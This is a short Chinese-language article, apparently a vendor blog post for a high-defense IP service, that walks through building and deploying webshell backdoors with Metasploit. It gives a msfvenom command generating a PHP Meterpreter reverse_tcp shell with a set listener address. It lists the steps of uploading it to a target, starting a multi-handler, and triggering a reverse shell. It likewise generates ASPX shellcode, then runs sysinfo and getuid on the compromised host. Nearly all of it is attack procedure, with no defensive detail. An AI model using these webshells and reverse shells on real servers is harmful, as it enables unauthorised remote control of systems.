高防IP实测webshell攻击模式
目前,尽管有很多企业用户会使用到高防IP来防御Wabshell后门,但大多不清楚这种攻击的模式。
现在我们来看一下具体的操作。
Meterpreter后门
在metasploit中,有一个名为PHP Meterpreter的payload,利用这个可以创建具有Meterpreter功能的PHP webshell步骤如下所示:
1、使用msfvenom创建一个webshell.php
2、上传webshell.php到目标服务器
3、运行metasploit mulit-handler开始监听
4、访问webshell.php页面
5、获得反弹的metasploit shell
制作PHP Meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 -f raw >111.php
-p:设置payload
-f:设置输出文件格式
我在win7上搭建了phpstudy,将文件复制到phpstudy的www目录下,启动msfconsole进行监听,配置以下命令:
访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。
Aspx Meterpreter后门
在攻击中使用Aspx Meterpreter后门的步骤与PHP Meterpreter的大概相同。
调用模块msf5>use windows/shell reverse tcp,查看需要设置的参数,设置好端口和攻击目标主机IP后输入generate -h查看帮助命令。
生成个版本的shellcode命令:
generate -f asp生成asp版的shellcode
generate -f aspx生成aspx版的shellcode
在这里使用aspx版的shellcode,将内容保存为222.aspx,上传到phpstudy的www目录下,设置监听,最后访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。
上一篇: Webshell在云WAF的保障下溃逃
下一篇: 高防IP:杜蕾斯,我也可以